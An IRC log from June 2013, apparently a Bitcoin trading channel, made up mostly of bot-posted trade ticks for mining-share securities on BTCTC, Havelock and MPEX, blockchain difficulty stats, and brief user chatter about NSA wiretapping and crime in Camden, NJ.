Jun 16 19:13:09 [BTCTC] [DMS.MINING] 15 @ 0.03 = 0.45 BTC [+] Jun 16 19:13:10 [BTCTC] [DMS.MINING] 1 @ 0.03089 BTC [+] Jun 16 19:16:43 [BTCTC] [DMS.PURCHASE] 170 @ 0.066149 = 11.2453 BTC [+] Jun 16 19:18:15 [HAVELOCK] [VTX] 1 @ 0.4999 BTC [-] Jun 16 19:19:21 [BTCTC] [BITVPS] 80 @ 0.000709 = 0.0567 BTC [+] Jun 16 19:24:58 [BTCTC] [B.YABMC] 281 @ 0.015475 = 4.3485 BTC [+] Jun 16 19:25:00 [BTCTC] [B.YABMC] 469 @ 0.015476 = 7.2582 BTC [+] Jun 16 19:26:20 [HAVELOCK] [ASICM] 1 @ 0.0297 BTC [+] Jun 16 19:28:46 [BTCTC] [COGNITIVE] 10 @ 0.35 = 3.5 BTC [+] Jun 16 19:29:24 [BTCTC] [COGNITIVE] 4 @ 0.37 = 1.48 BTC [+] Jun 16 19:30:52 [BITFUNDER] [TAT.VIRTUALMINE] [PAID] 123,500 @ 0.00003223 Jun 16 19:31:13 [BTCTC] [DMS.MINING] 80 @ 0.0285 = 2.28 BTC [-] Jun 16 19:32:31 [BTCTC] [DMS.PURCHASE] 22 @ 0.066149 = 1.4553 BTC [+] Jun 16 19:33:16 [BTCTC] [DMS.MINING] 90 @ 0.02999 = 2.6991 BTC [+] Jun 16 19:34:29 [BTCTC] [DMS.MINING] 6 @ 0.03089 = 0.1853 BTC [+] Jun 16 19:36:12 mircea_popescu: doesn't she update you morning at MPEx's daily standup? Jun 16 19:36:20 every morning* Jun 16 19:37:04 ;;next Jun 16 19:37:05 expecting re-test of 88 | lower targets: 80-77, 67-72 | resistance: 102, 105-107, 110 | support: 92-94 | #bitcoin [Fri, 14 Jun 2013 04:21:56 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 2 days, 12 hours, 15 minutes, and 9 seconds ago Jun 16 19:37:21 not really fixed as "every morning". depends how important stuff is. Jun 16 19:38:33 ;;title http://news.cnet.com/8301-13578_3-57589495-38/nsa-admits-listening-to-u.s-phone-calls-without-warrants/ Jun 16 19:38:33 Error: This url is not on the whitelist. Jun 16 19:38:37 LOL Jun 16 19:38:54 The National Security Agency told Congress in a secret meeting that the NSA does not need court authorization to tap phones and that "an analyst's decision is sufficient, without any other legal authorization required." Jun 16 19:39:13 tl;dr The NSA says the Constitution does not apply to the agency. Jun 16 19:39:22 Further evidence the US is a rogue country? Jun 16 19:40:02 myea Jun 16 19:40:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00697 BTC [-] Jun 16 19:42:23 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.006811 = 0.3406 BTC [-] Jun 16 19:42:26 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.00681 = 0.1362 BTC [-] Jun 16 19:42:31 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00681 = 0.0204 BTC [-] Jun 16 19:43:25 [BTCTC] [DMS.MINING] 62 @ 0.02999 = 1.8594 BTC [-] Jun 16 19:44:41 [MPEX] [S.MPOE] 1800 @ 0.00070758 = 1.2736 BTC [-] Jun 16 19:44:43 [MPEX] [S.MPOE] 3650 @ 0.00070723 = 2.5814 BTC [-] Jun 16 19:44:58 [BTCTC] [DMS.MINING] 100 @ 0.0305 = 3.05 BTC [+] Jun 16 19:45:14 [BTCTC] [DMS.MINING] 16 @ 0.02999 = 0.4798 BTC [-] Jun 16 19:45:17 To answer your question not yet, the discourse is too much fun for me. It's like being at conference all over again. Jun 16 19:45:30 GDC round 2 Jun 16 19:45:49 lol Jun 16 19:45:54 [BTCTC] [DMS.PURCHASE] 150 @ 0.066149 = 9.9224 BTC [+] Jun 16 19:46:13 [BTCTC] [TAT.ASICMINER] 6 @ 0.028 = 0.168 BTC [-] Jun 16 19:47:01 [BTCTC] [DMS.MINING] 47 @ 0.02999 = 1.4095 BTC [-] Jun 16 19:51:50 [HAVELOCK] [ASICM] 1 @ 0.0297 BTC [+] Jun 16 19:55:25 mircea_popescu: how is MG's publishing process going to work? Jun 16 19:55:43 planning on making the Bitcoin version of Steam? Jun 16 20:01:03 [BTCTC] [DMS.PURCHASE] 10 @ 0.066149 = 0.6615 BTC [+] Jun 16 20:01:34 ;;bc,stats Jun 16 20:01:35 Current Blocks: 241884 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 35 blocks | Next Difficulty In About: 4 hours, 14 minutes, and 32 seconds | Next Difficulty Estimate: 19336537.3553 | Estimated Percent Change: 23.90742 Jun 16 20:04:57 [BTCTC] [DMS.PURCHASE] 100 @ 0.066149 = 6.6149 BTC [+] Jun 16 20:10:36 [HAVELOCK] [ASICM] 6 @ 0.0297 = 0.1782 BTC [+] Jun 16 20:12:20 [BTCTC] [DMS.PURCHASE] 25 @ 0.066149 = 1.6537 BTC [+] Jun 16 20:14:03 vote for pedro Jun 16 20:15:25 [BTCTC] [TAT.ASICMINER] 3 @ 0.028866 = 0.0866 BTC [+] Jun 16 20:17:52 [MPEX] [S.MPOE] 5400 @ 0.00070723 = 3.819 BTC [-] Jun 16 20:17:53 [MPEX] [S.MPOE] 1346 @ 0.00070522 = 0.9492 BTC [-] Jun 16 20:20:07 [MPEX] [S.MPOE] 2010 @ 0.00070435 = 1.4157 BTC [-] Jun 16 20:20:09 [MPEX] [S.MPOE] 3909 @ 0.00070782 = 2.7669 BTC [+] Jun 16 20:20:17 [MPEX] [S.MPOE] 4681 @ 0.00070959 = 3.3216 BTC [+] Jun 16 20:20:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.028866 = 0.0866 BTC [+] Jun 16 20:25:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.028864 = 0.2309 BTC [-] Jun 16 20:26:02 ;;tslb Jun 16 20:26:05 Time since last block: 10 minutes and 31 seconds Jun 16 20:27:18 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.00682 = 0.2046 BTC [+] Jun 16 20:27:56 [BTCTC] [DMS.SELLING] 4 @ 0.04397 = 0.1759 BTC [-] Jun 16 20:28:17 [BTCTC] [DMS.SELLING] 2 @ 0.04397 = 0.0879 BTC [-] Jun 16 20:31:54 [BTCTC] [BITVPS] 80 @ 0.00072 = 0.0576 BTC [+] Jun 16 20:33:08 that's the 2nd time you said that Jun 16 20:33:12 what are you talkin bout Jun 16 20:34:23 [BTCTC] [B.YABMC] 3 @ 0.015476 = 0.0464 BTC [+] Jun 16 20:35:22 [BTCTC] [RSM] 3 @ 0.0179 = 0.0537 BTC [+] Jun 16 20:37:27 [BTCTC] [TAT.ASICMINER] 12 @ 0.028863 = 0.3464 BTC [-] Jun 16 20:37:29 [BTCTC] [TAT.ASICMINER] 36 @ 0.028864 = 1.0391 BTC [+] Jun 16 20:37:29 [BTCTC] [TAT.ASICMINER] 7 @ 0.028866 = 0.2021 BTC [+] Jun 16 20:37:31 [BTCTC] [TAT.ASICMINER] 55 @ 0.02887 = 1.5879 BTC [+] Jun 16 20:37:42 [BTCTC] [DMS.MINING] 4 @ 0.02997 = 0.1199 BTC [-] Jun 16 20:38:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.028995 = 0.058 BTC [+] Jun 16 20:39:16 [HAVELOCK] [ASICM] 20 @ 0.0286 = 0.572 BTC [-] Jun 16 20:39:39 [BTCTC] [TAT.ASICMINER] 4 @ 0.029 = 0.116 BTC [+] Jun 16 20:40:54 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00697 = 0.0209 BTC [+] Jun 16 20:45:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.028999 BTC [-] Jun 16 20:45:24 [HAVELOCK] [ASICM] 50 @ 0.0285001 = 1.425 BTC [-] Jun 16 20:45:44 [HAVELOCK] [ASICM] 37 @ 0.0285 = 1.0545 BTC [-] Jun 16 20:55:55 [BTCTC] [ASICMINER-PT] 1 @ 2.8895 BTC [-] Jun 16 21:06:56 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00683 = 0.0205 BTC [-] Jun 16 21:15:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00697 BTC [+] Jun 16 21:17:40 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.00697 = 0.0976 BTC [+] Jun 16 21:20:03 [HAVELOCK] [ASICM] 4 @ 0.02845001 = 0.1138 BTC [-] Jun 16 21:20:12 [HAVELOCK] [ASICM] 3 @ 0.02845 = 0.0854 BTC [-] Jun 16 21:20:39 [HAVELOCK] [ASICM] 1 @ 0.0283501 BTC [-] Jun 16 21:20:48 [HAVELOCK] [ASICM] 57 @ 0.02831 = 1.6137 BTC [-] Jun 16 21:21:00 [HAVELOCK] [ASICM] 105 @ 0.0283 = 2.9715 BTC [-] Jun 16 21:22:33 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.00697 = 0.1046 BTC [+] Jun 16 21:27:10 [BTCTC] [DMS.PURCHASE] 39 @ 0.066149 = 2.5798 BTC [+] Jun 16 21:27:23 [BTCTC] [PAJKA.BOND] 10 @ 0.078101 = 0.781 BTC [-] Jun 16 21:27:25 [BTCTC] [PAJKA.BOND] 50 @ 0.0781 = 3.905 BTC [-] Jun 16 21:27:27 [BTCTC] [PAJKA.BOND] 1 @ 0.078 BTC [-] Jun 16 21:27:30 [BTCTC] [PAJKA.BOND] 1 @ 0.078 BTC [-] Jun 16 21:27:32 [BTCTC] [PAJKA.BOND] 15 @ 0.0746 = 1.119 BTC [-] Jun 16 21:27:37 [BTCTC] [PAJKA.BOND] 2 @ 0.0745 = 0.149 BTC [-] Jun 16 21:27:42 [BTCTC] [PAJKA.BOND] 10 @ 0.0745 = 0.745 BTC [-] Jun 16 21:31:20 [BTCTC] [PAJKA.BOND] 18 @ 0.0745 = 1.341 BTC [-] Jun 16 21:32:31 [BTCTC] [DMS.MINING] 2 @ 0.02997 = 0.0599 BTC [-] Jun 16 21:32:45 [MPEX] [S.MPOE] 3430 @ 0.00070388 = 2.4143 BTC [-] Jun 16 21:32:46 [MPEX] [S.MPOE] 2455 @ 0.00070387 = 1.728 BTC [-] Jun 16 21:33:00 [MPEX] [S.MPOE] 2000 @ 0.00070063 = 1.4013 BTC [-] Jun 16 21:33:01 [MPEX] [S.MPOE] 1864 @ 0.00069971 = 1.3043 BTC [-] Jun 16 21:35:07 [BTCTC] [DMS.MINING] 1 @ 0.0288 BTC [-] Jun 16 21:35:09 [BTCTC] [DMS.MINING] 20 @ 0.027701 = 0.554 BTC [-] Jun 16 21:35:10 [BTCTC] [DMS.MINING] 3 @ 0.0277 = 0.0831 BTC [-] Jun 16 21:35:12 [BTCTC] [DMS.MINING] 4 @ 0.0276 = 0.1104 BTC [-] Jun 16 21:35:13 [BTCTC] [DMS.MINING] 25 @ 0.02751 = 0.6878 BTC [-] Jun 16 21:35:15 [BTCTC] [DMS.MINING] 30 @ 0.027501 = 0.825 BTC [-] Jun 16 21:35:57 [BTCTC] [DMS.PURCHASE] 65 @ 0.066149 = 4.2997 BTC [+] Jun 16 21:36:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.029 = 0.145 BTC [+] Jun 16 21:37:10 [BTCTC] [TAT.ASICMINER] 4 @ 0.029389 = 0.1176 BTC [+] Jun 16 21:41:03 [BTCTC] [PAJKA.BOND] 2 @ 0.0745 = 0.149 BTC [-] Jun 16 21:46:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.029389 BTC [+] Jun 16 21:50:14 mircea_popescu I SUMMON THEE!!!!! Jun 16 21:50:57 oh before I forget Jun 16 21:51:01 happy father's day mircea_popescu Jun 16 21:52:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.0293 = 0.293 BTC [-] Jun 16 21:54:55 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [+] Jun 16 21:55:45 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.00697 = 0.0906 BTC [+] Jun 16 22:01:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.029389 BTC [+] Jun 16 22:03:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.029389 = 0.2939 BTC [+] Jun 16 22:06:53 [BTCTC] [ASICMINER-PT] 3 @ 2.89 = 8.67 BTC [+] Jun 16 22:08:40 [BTCTC] [TAT.VIRTUALMINE] 57 @ 0.00697 = 0.3973 BTC [+] Jun 16 22:09:50 wtf Jun 16 22:09:50 lol Jun 16 22:10:43 lolty Jun 16 22:11:00 [BTCTC] [DMS.MINING] 19 @ 0.027502 = 0.5225 BTC [+] Jun 16 22:11:02 [BTCTC] [DMS.MINING] 70 @ 0.027501 = 1.9251 BTC [-] Jun 16 22:11:14 [BTCTC] [DMS.MINING] 11 @ 0.0275 = 0.3025 BTC [-] Jun 16 22:12:49 [HAVELOCK] [ASICM] 4 @ 0.02899979 = 0.116 BTC [+] Jun 16 22:13:06 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 16 22:13:14 [BTCTC] [DMS.MINING] 13 @ 0.02761 = 0.3589 BTC [+] Jun 16 22:13:42 [HAVELOCK] [ASICM] 4 @ 0.0289998 = 0.116 BTC [+] Jun 16 22:14:07 [BTCTC] [DMS.PURCHASE] 50 @ 0.066149 = 3.3075 BTC [+] Jun 16 22:14:19 [BTCTC] [S.MPOE-PT] 1 @ 0.000645 BTC [+] Jun 16 22:14:50 [HAVELOCK] [ASICM] 50 @ 0.0289999 = 1.45 BTC [+] Jun 16 22:18:46 dazz raciss Jun 16 22:20:39 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00698 = 0.014 BTC [+] Jun 16 22:23:24 [HAVELOCK] [ASICM] 105 @ 0.02899999 = 3.045 BTC [+] Jun 16 22:23:30 should just burn it to the ground Jun 16 22:23:59 my state has its own problem city, camden Jun 16 22:24:04 most agree, burn it down Jun 16 22:24:20 camden has a history of being worse than detroit for crime Jun 16 22:24:22 NJ Jun 16 22:24:31 [HAVELOCK] [ASICM] 400 @ 0.029 = 11.6 BTC [+] Jun 16 22:24:32 nothing a few B2's can't solve Jun 16 22:24:54 lemme put it this way, it makes newark look like a great place Jun 16 22:25:33 but muh welfare Jun 16 22:26:04 i got lost there coming out from philly some years ago at night and was stopped by a cop who asked me 1. why i stopped at a red light and didn't continue going. and 2. why i didn't have a weapon with me Jun 16 22:28:12 [BTCTC] [DMS.MINING] 4 @ 0.02681 = 0.1072 BTC [-] Jun 16 22:28:13 [BTCTC] [DMS.MINING] 89 @ 0.0268 = 2.3852 BTC [-] Jun 16 22:28:52 oh he knew i wasn't from there, that's why he stopped me Jun 16 22:29:07 this was before they layed off like half of the police force too Jun 16 22:29:11 it got worse after that Jun 16 22:29:20 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 16 22:29:41 never said i was staying here Jun 16 22:30:10 where would you go? Jun 16 22:30:23 pankkake: i already spend about half of my time in canada Jun 16 22:32:05 [HAVELOCK] [ASICM] 18 @ 0.029 = 0.522 BTC [+] Jun 16 22:36:30 [BTCTC] [S.DICE-PT] 3 @ 0.002456 = 0.0074 BTC [-] Jun 16 22:39:47 [HAVELOCK] [ASICM] 1 @ 0.02899999 BTC [-] Jun 16 22:40:23 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 16 22:40:35 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00698 = 0.0349 BTC [+] Jun 16 22:42:56 [BTCTC] [B.YABMC] 1 @ 0.01547 BTC [-] Jun 16 22:46:01 [BTCTC] [B.YABMC] 4 @ 0.015476 = 0.0619 BTC [+] Jun 16 22:46:19 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 16 22:46:21 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 16 22:46:24 [BTCTC] [ASICMINER-PT] 1 @ 2.873002 BTC [-] Jun 16 22:46:27 [BTCTC] [ASICMINER-PT] 1 @ 2.851011 BTC [-] Jun 16 22:46:30 [BTCTC] [ASICMINER-PT] 1 @ 2.851 BTC [-] Jun 16 22:46:32 [BTCTC] [ASICMINER-PT] 2 @ 2.8404 = 5.6808 BTC [-] Jun 16 22:46:33 [BTCTC] [ASICMINER-PT] 1 @ 2.8403 BTC [-] Jun 16 22:46:35 [BTCTC] [ASICMINER-PT] 1 @ 2.8401 BTC [-] Jun 16 22:46:46 [BTCTC] [ASICMINER-PT] 1 @ 2.840001 BTC [-] Jun 16 22:46:52 [BTCTC] [ASICMINER-PT] 23 @ 2.84 = 65.32 BTC [-] Jun 16 22:47:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.029387 = 0.1175 BTC [-] Jun 16 22:48:06 [BTCTC] [TAT.ASICMINER] 17 @ 0.029387 = 0.4996 BTC [-] Jun 16 22:48:18 [BTCTC] [TAT.ASICMINER] 8 @ 0.0291 = 0.2328 BTC [-] Jun 16 22:49:51 [HAVELOCK] [ASICM] 8 @ 0.02899999 = 0.232 BTC [-] Jun 16 22:52:44 [MPEX] [S.MPOE] 3900 @ 0.00070634 = 2.7547 BTC [+] Jun 16 22:54:01 [BTCTC] [S.BBET-PT] 1 @ 0.00219 BTC [+] Jun 16 23:00:07 [HAVELOCK] [ASICM] 1 @ 0.02899999 BTC [-] Jun 16 23:01:51 [BTCTC] [TAT.ASICMINER] 4 @ 0.029011 = 0.116 BTC [-] Jun 16 23:01:58 [BTCTC] [B.YABMC] 1 @ 0.015476 BTC [+] Jun 16 23:05:41 [HAVELOCK] [ASICM] 69 @ 0.02899999 = 2.001 BTC [-] Jun 16 23:06:30 [BTCTC] [TAT.ASICMINER] 46 @ 0.029011 = 1.3345 BTC [-] Jun 16 23:06:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02901 BTC [-] Jun 16 23:06:52 [BTCTC] [ASICMINER-PT] 1 @ 2.8688 BTC [+] Jun 16 23:06:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0293 BTC [+] Jun 16 23:08:07 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006979 BTC [-] Jun 16 23:12:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.02901 = 0.116 BTC [-] Jun 16 23:12:37 [HAVELOCK] [ASICM] 4 @ 0.0289 = 0.1156 BTC [-] Jun 16 23:18:58 [HAVELOCK] [VTX] 1 @ 0.485 BTC [-] Jun 16 23:21:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.02901 = 0.1451 BTC [-] Jun 16 23:22:55 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.006979 = 0.342 BTC [-] Jun 16 23:23:01 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.006979 = 0.349 BTC [-] Jun 16 23:23:06 [BTCTC] [TAT.VIRTUALMINE] 31 @ 0.00698 = 0.2164 BTC [+] Jun 16 23:23:07 [BTCTC] [TAT.VIRTUALMINE] 70 @ 0.00698 = 0.4886 BTC [+] Jun 16 23:25:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.0289 = 0.1156 BTC [-] Jun 16 23:26:31 [BTCTC] [TAT.ASICMINER] 11 @ 0.0289 = 0.3179 BTC [-] Jun 16 23:27:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.0285 = 0.1425 BTC [-] Jun 16 23:27:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0284 BTC [-] Jun 16 23:27:57 [BTCTC] [TAT.ASICMINER] 11 @ 0.028304 = 0.3113 BTC [-] Jun 16 23:36:28 [BTCTC] [DMS.PURCHASE] 1 @ 0.066149 BTC [+] Jun 16 23:36:43 [BTCTC] [DMS.PURCHASE] 1 @ 0.066149 BTC [+] Jun 16 23:42:41 [HAVELOCK] [ASICM] 4 @ 0.02851005 = 0.114 BTC [-] Jun 16 23:42:47 [HAVELOCK] [ASICM] 51 @ 0.02851 = 1.454 BTC [-] Jun 16 23:43:43 [HAVELOCK] [ASICM] 20 @ 0.02850034 = 0.57 BTC [-] Jun 16 23:46:43 [BTCTC] [ASICMINER-PT] 1 @ 2.8499 BTC [-] Jun 16 23:46:45 [BTCTC] [ASICMINER-PT] 20 @ 2.85 = 57 BTC [+] Jun 16 23:52:55 [BTCTC] [TAT.ASICMINER] 14 @ 0.028999 = 0.406 BTC [+] Jun 16 23:57:26 ;;bc,diff Jun 16 23:57:26 Error: "bc,diff" is not a valid command. Jun 16 23:57:31 ;;bc,stats Jun 16 23:57:32 Current Blocks: 241912 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 7 blocks | Next Difficulty In About: 54 minutes and 11 seconds | Next Difficulty Estimate: 19321246.4513 | Estimated Percent Change: 23.80944 Jun 17 00:06:50 [BTCTC] [GSDPT] 5 @ 0.0026 = 0.013 BTC [-] Jun 17 00:11:27 ;;diff Jun 17 00:11:28 1.5605632681285927E7 Jun 17 00:13:39 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00682 = 0.0682 BTC [-] Jun 17 00:25:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.028999 BTC [+] Jun 17 00:27:44 [BTCTC] [S.DICE-PT] 1 @ 0.002639 BTC [+] Jun 17 00:28:21 [BTCTC] [S.DICE-PT] 7 @ 0.002639 = 0.0185 BTC [+] Jun 17 00:33:40 [BTCTC] [TAT.ASICMINER] 35 @ 0.028999 = 1.015 BTC [+] Jun 17 00:36:15 [BTCTC] [TAT.ASICMINER] 25 @ 0.028999 = 0.725 BTC [+] Jun 17 00:40:51 ;;bc,stats Jun 17 00:40:52 Current Blocks: 241920 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 2015 blocks | Next Difficulty In About: 1 week, 4 days, 4 hours, 40 minutes, and 0 seconds | Next Difficulty Estimate: 77357033.0895 | Estimated Percent Change: 300.0 Jun 17 00:41:02 [BTCTC] [DMS.MINING] 30 @ 0.0272 = 0.816 BTC [+] Jun 17 00:41:05 [BTCTC] [DMS.MINING] 29 @ 0.027105 = 0.786 BTC [-] Jun 17 00:41:07 [BTCTC] [DMS.MINING] 40 @ 0.027101 = 1.084 BTC [-] Jun 17 00:41:08 [BTCTC] [DMS.MINING] 23 @ 0.0271 = 0.6233 BTC [-] Jun 17 00:41:59 [BTCTC] [DMS.PURCHASE] 46 @ 0.066149 = 3.0429 BTC [+] Jun 17 00:42:27 ;;nethash Jun 17 00:42:29 145158.514658 Jun 17 00:44:08 [HAVELOCK] [ASICM] 4 @ 0.02889989 = 0.1156 BTC [+] Jun 17 00:44:39 [HAVELOCK] [ASICM] 50 @ 0.0288999 = 1.445 BTC [+] Jun 17 00:47:42 [HAVELOCK] [HIM] 3 @ 0.292 = 0.876 BTC [-] Jun 17 00:48:42 [BTCTC] [DMS.SELLING] 7 @ 0.04275 = 0.2993 BTC [-] Jun 17 00:50:20 ;;calc (25-19.3392)/19.3392 Jun 17 00:50:49 ;;calc (25-19.3392)/19.3392 Jun 17 00:50:52 0.292711177298 Jun 17 00:51:36 [MPEX] [S.MPOE] 7500 @ 0.00070488 = 5.2866 BTC [-] Jun 17 00:51:37 [MPEX] [S.MPOE] 400 @ 0.00070572 = 0.2823 BTC [+] Jun 17 00:54:26 [HAVELOCK] [ASICM] 1 @ 0.0288999 BTC [+] Jun 17 01:01:12 [BTCTC] [DMS.MINING] 10 @ 0.0275 = 0.275 BTC [+] Jun 17 01:01:19 [BTCTC] [DMS.MINING] 36 @ 0.0271 = 0.9756 BTC [-] Jun 17 01:07:42 [BTCTC] [B.YABMC] 124 @ 0.012021 = 1.4906 BTC [-] Jun 17 01:07:44 [BTCTC] [B.YABMC] 1 @ 0.01202 BTC [-] Jun 17 01:07:48 [BTCTC] [B.YABMC] 100 @ 0.012 = 1.2 BTC [-] Jun 17 01:07:50 [BTCTC] [B.YABMC] 92 @ 0.011452 = 1.0536 BTC [-] Jun 17 01:10:12 [BTCTC] [TAT.ASICMINER] 35 @ 0.028313 = 0.991 BTC [-] Jun 17 01:11:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.028315 BTC [+] Jun 17 01:11:16 [HAVELOCK] [ASICM] 1 @ 0.0289 BTC [+] Jun 17 01:22:27 [HAVELOCK] [ASICM] 2 @ 0.0288999 = 0.0578 BTC [-] Jun 17 01:24:05 [BTCTC] [COGNITIVE] 3 @ 0.369999 = 1.11 BTC [-] Jun 17 01:25:16 [BTCTC] [TAT.ASICMINER] 13 @ 0.028996 = 0.3769 BTC [+] Jun 17 01:30:31 [BTCTC] [COGNITIVE] 1 @ 0.37 BTC [+] Jun 17 01:30:51 [BTCTC] [TAT.ASICMINER] 28 @ 0.028995 = 0.8119 BTC [-] Jun 17 01:33:54 [BTCTC] [BTC-BOND] 3 @ 0.009997 = 0.03 BTC [+] Jun 17 01:35:09 [BTCTC] [GSDPT] 1 @ 0.0029 BTC [+] Jun 17 01:36:02 [BTCTC] [GSDPT] 1 @ 0.0029 BTC [+] Jun 17 01:40:40 [BTCTC] [S.MPOE-PT] 2 @ 0.000703 = 0.0014 BTC [+] Jun 17 01:41:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.028994 BTC [-] Jun 17 01:44:30 [BTCTC] [DMS.MINING] 40 @ 0.0272 = 1.088 BTC [+] Jun 17 02:00:43 [BTCTC] [DMS.SELLING] 2 @ 0.042 = 0.084 BTC [-] Jun 17 02:01:06 [BTCTC] [DMS.SELLING] 1 @ 0.042 BTC [-] Jun 17 02:11:00 [HAVELOCK] [ASICM] 4 @ 0.02850106 = 0.114 BTC [-] Jun 17 02:11:05 [HAVELOCK] [ASICM] 2 @ 0.02850105 = 0.057 BTC [-] Jun 17 02:11:12 [HAVELOCK] [ASICM] 7 @ 0.0285003 = 0.1995 BTC [-] Jun 17 02:11:16 [HAVELOCK] [ASICM] 1 @ 0.0285 BTC [-] Jun 17 02:11:22 [HAVELOCK] [ASICM] 52 @ 0.028351 = 1.4743 BTC [-] Jun 17 02:11:32 [HAVELOCK] [ASICM] 4 @ 0.02835022 = 0.1134 BTC [-] Jun 17 02:11:42 [HAVELOCK] [ASICM] 25 @ 0.02835021 = 0.7088 BTC [-] Jun 17 02:12:08 [HAVELOCK] [ASICM] 76 @ 0.0283502 = 2.1546 BTC [-] Jun 17 02:13:25 [HAVELOCK] [ASICM] 15 @ 0.02835 = 0.4253 BTC [-] Jun 17 02:13:44 [HAVELOCK] [ASICM] 4 @ 0.02832 = 0.1133 BTC [-] Jun 17 02:13:46 [MPEX] [S.MPOE] 6650 @ 0.00070565 = 4.6926 BTC [-] Jun 17 02:13:47 [MPEX] [S.MPOE] 300 @ 0.00070572 = 0.2117 BTC [+] Jun 17 02:18:25 [BTCTC] [ASICMINER-PT] 1 @ 2.84001 BTC [-] Jun 17 02:18:30 [BTCTC] [ASICMINER-PT] 5 @ 2.84 = 14.2 BTC [-] Jun 17 02:18:31 [BTCTC] [ASICMINER-PT] 1 @ 2.831 BTC [-] Jun 17 02:18:32 [BTCTC] [ASICMINER-PT] 1 @ 2.8301 BTC [-] Jun 17 02:18:35 [BTCTC] [ASICMINER-PT] 1 @ 2.830001 BTC [-] Jun 17 02:18:38 [BTCTC] [ASICMINER-PT] 25 @ 2.83 = 70.75 BTC [-] Jun 17 02:18:40 [BTCTC] [ASICMINER-PT] 1 @ 2.820001 BTC [-] Jun 17 02:18:44 [BTCTC] [ASICMINER-PT] 127 @ 2.82 = 358.14 BTC [-] Jun 17 02:30:56 [HAVELOCK] [ASICM] 5 @ 0.02832 = 0.1416 BTC [-] Jun 17 02:31:15 [HAVELOCK] [ASICM] 55 @ 0.02831 = 1.5571 BTC [-] Jun 17 02:32:30 [HAVELOCK] [ASICM] 25 @ 0.02831 = 0.7078 BTC [-] Jun 17 02:32:46 [HAVELOCK] [ASICM] 25 @ 0.02831 = 0.7078 BTC [-] Jun 17 02:33:12 [BTCTC] [ASICMINER-PT] 1 @ 2.816001 BTC [-] Jun 17 02:41:43 [BTCTC] [BITVPS] 12 @ 0.000671 = 0.0081 BTC [-] Jun 17 02:42:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.028987 BTC [-] Jun 17 02:53:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00684 BTC [+] Jun 17 02:56:02 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.00684 = 0.0616 BTC [+] Jun 17 03:01:11 [MPEX] [S.MPOE] 8000 @ 0.00070503 = 5.6402 BTC [-] Jun 17 03:01:13 [MPEX] [S.MPOE] 10459 @ 0.00070457 = 7.3691 BTC [-] Jun 17 03:01:14 [MPEX] [S.MPOE] 41 @ 0.00070451 = 0.0289 BTC [-] Jun 17 03:04:05 [BTCTC] [TAT.ASICMINER] 21 @ 0.028501 = 0.5985 BTC [-] Jun 17 03:04:24 [BTCTC] [TAT.ASICMINER] 79 @ 0.0285 = 2.2515 BTC [-] Jun 17 03:07:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00684 BTC [+] Jun 17 03:08:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00684 BTC [+] Jun 17 03:11:02 [BTCTC] [ASICMINER-PT] 1 @ 2.816001 BTC [-] Jun 17 03:11:29 [BTCTC] [ASICMINER-PT] 1 @ 2.816 BTC [-] Jun 17 03:11:58 [BTCTC] [ASICMINER-PT] 1 @ 2.816 BTC [-] Jun 17 03:13:02 [MPEX] [S.MPOE] 5717 @ 0.00070451 = 4.0277 BTC [-] Jun 17 03:16:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.028979 = 0.1449 BTC [+] Jun 17 03:17:15 [BTCTC] [DMS.MINING] 1 @ 0.0271 BTC [-] Jun 17 03:17:17 [BTCTC] [DMS.MINING] 10 @ 0.027 = 0.27 BTC [-] 